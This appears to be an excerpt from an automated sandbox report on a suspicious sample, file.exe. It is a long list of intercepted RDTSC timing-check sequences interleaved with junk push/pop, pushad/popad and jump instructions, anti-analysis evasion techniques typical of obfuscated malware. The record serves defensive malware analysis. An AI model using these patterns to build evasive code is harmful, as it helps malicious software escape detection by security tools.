            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1027674 second address: 1027684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jnp 00007FD888D50BE6h 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1027684 second address: 10276A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FD888F38A26h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD888F38A30h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10277FF second address: 102780A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FD888D50BE6h 0x0000000a pop esi 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102794A second address: 1027977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 jnl 00007FD888F38A26h 0x0000000e jg 00007FD888F38A26h 0x00000014 pop ebx 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jo 00007FD888F38A28h 0x0000001e push edi 0x0000001f pop edi 0x00000020 jmp 00007FD888F38A2Dh 0x00000025 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1027977 second address: 102797D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102797D second address: 1027981 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1027ACE second address: 1027AD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FD888D50BE6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1027AD8 second address: 1027ADC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1027C31 second address: 1027C3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1027C3E second address: 1027C65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jne 00007FD888F38A28h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007FD888F38A2Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 ja 00007FD888F38A26h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1027C65 second address: 1027C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1027C69 second address: 1027C6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1027DAF second address: 1027DFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD888D50BF4h 0x00000009 jmp 00007FD888D50BF1h 0x0000000e popad 0x0000000f jne 00007FD888D50BECh 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007FD888D50BF3h 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10280A6 second address: 10280AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10280AA second address: 10280BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FD888D50BE6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10280BA second address: 10280BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10280BE second address: 10280EC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FD888D50BEDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FD888D50BF7h 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102FF99 second address: 102FFB9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD888F38A26h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007FD888F38A2Eh 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102FFB9 second address: 102FFBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102FFBE second address: 102FFC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102FFC7 second address: 102FFE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD888D50BF6h 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102F9E3 second address: 102F9F1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD888F38A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102F9F1 second address: 102F9F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102F9F5 second address: 102F9F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102F9F9 second address: 102F9FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102FB4F second address: 102FB55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102FB55 second address: 102FB5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102FC92 second address: 102FC97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102FC97 second address: 102FCF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FD888D50BF3h 0x00000008 jmp 00007FD888D50BF9h 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007FD888D50BF0h 0x00000014 pop eax 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD888D50BF1h 0x0000001f jno 00007FD888D50BE6h 0x00000025 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103C61C second address: 103C62D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jl 00007FD888F38A26h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103C62D second address: 103C647 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888D50BF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103C647 second address: 103C64D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103F652 second address: 103F658 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103F1E0 second address: 103F1F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 jmp 00007FD888F38A2Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103F1F3 second address: 103F200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FD888D50BE6h 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103F37C second address: 103F381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103F381 second address: 103F39A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD888D50BF5h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1042B8F second address: 1042B93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1042B93 second address: 1042BD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888D50BEFh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FD888D50BEEh 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 jmp 00007FD888D50BF1h 0x0000001b push eax 0x0000001c push edx 0x0000001d js 00007FD888D50BE6h 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1042BD5 second address: 1042BF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888F38A37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1042BF6 second address: 1042BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1042BFC second address: 1042C02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1042C02 second address: 1042C07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10524DC second address: 10524EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FD888F38A2Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105CBBA second address: 105CBBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105B834 second address: 105B850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD888F38A35h 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105B850 second address: 105B856 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105B856 second address: 105B85C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105B85C second address: 105B884 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007FD888D50BE6h 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD888D50BF8h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105B884 second address: 105B888 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105BCAE second address: 105BCB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105BF7C second address: 105BF96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD888F38A30h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105BF96 second address: 105BF9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105BF9C second address: 105BFB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FD888F38A26h 0x0000000a popad 0x0000000b pushad 0x0000000c jg 00007FD888F38A26h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105BFB2 second address: 105BFC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FD888D50BE6h 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105C8D9 second address: 105C8DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105C8DD second address: 105C8E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jg 00007FD888D50BE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105C8E9 second address: 105C8F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FD888F38A26h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105C8F3 second address: 105C8F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1060A9E second address: 1060AAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jne 00007FD888F38A26h 0x0000000c popad 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1062E1F second address: 1062E23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1062E23 second address: 1062E29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1064FE4 second address: 1065005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jns 00007FD888D50BF2h 0x0000000d jng 00007FD888D50BEEh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107D358 second address: 107D35C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107D35C second address: 107D362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107D362 second address: 107D38B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jnl 00007FD888F38A26h 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD888F38A30h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107D38B second address: 107D3AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888D50BF6h 0x00000007 jnl 00007FD888D50BE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107D3AB second address: 107D3B0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107FBE4 second address: 107FBE9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107FBE9 second address: 107FC0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b jmp 00007FD888F38A36h 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107FC0F second address: 107FC13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107FC13 second address: 107FC17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107FC17 second address: 107FC1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1082E65 second address: 1082E6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1082E6B second address: 1082E6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1084C68 second address: 1084C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109B7AC second address: 109B7B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109B7B2 second address: 109B7B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A09F2 second address: 10A0A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jnc 00007FD888D50BE8h 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A0A01 second address: 10A0A21 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD888F38A28h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD888F38A34h 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109F8F7 second address: 109F8FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109F8FE second address: 109F907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109F907 second address: 109F921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD888D50BF6h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109FD09 second address: 109FD34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888F38A30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jmp 00007FD888F38A34h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109FE88 second address: 109FE8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A02EF second address: 10A02F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FD888F38A26h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A02F9 second address: 10A02FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A0441 second address: 10A0446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A06E0 second address: 10A0701 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD888D50BE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD888D50BF5h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A0701 second address: 10A0734 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888F38A35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007FD888F38A2Fh 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 pop eax 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A375E second address: 10A37BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD888D50BEDh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jnc 00007FD888D50BE6h 0x00000016 push edx 0x00000017 pop edx 0x00000018 popad 0x00000019 pop edx 0x0000001a nop 0x0000001b mov dl, cl 0x0000001d push 00000004h 0x0000001f push 00000000h 0x00000021 push edi 0x00000022 call 00007FD888D50BE8h 0x00000027 pop edi 0x00000028 mov dword ptr [esp+04h], edi 0x0000002c add dword ptr [esp+04h], 00000019h 0x00000034 inc edi 0x00000035 push edi 0x00000036 ret 0x00000037 pop edi 0x00000038 ret 0x00000039 sbb edx, 2398006Dh 0x0000003f call 00007FD888D50BE9h 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 push esi 0x00000048 pop esi 0x00000049 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A37BA second address: 10A37E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888F38A2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FD888F38A2Fh 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push ecx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A37E5 second address: 10A380C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007FD888D50BEAh 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jp 00007FD888D50BE6h 0x0000001b jno 00007FD888D50BE6h 0x00000021 popad 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A380C second address: 10A3816 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FD888F38A26h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A3816 second address: 10A382A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD888D50BE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A4E89 second address: 10A4E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A4E91 second address: 10A4E9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888D50BEAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
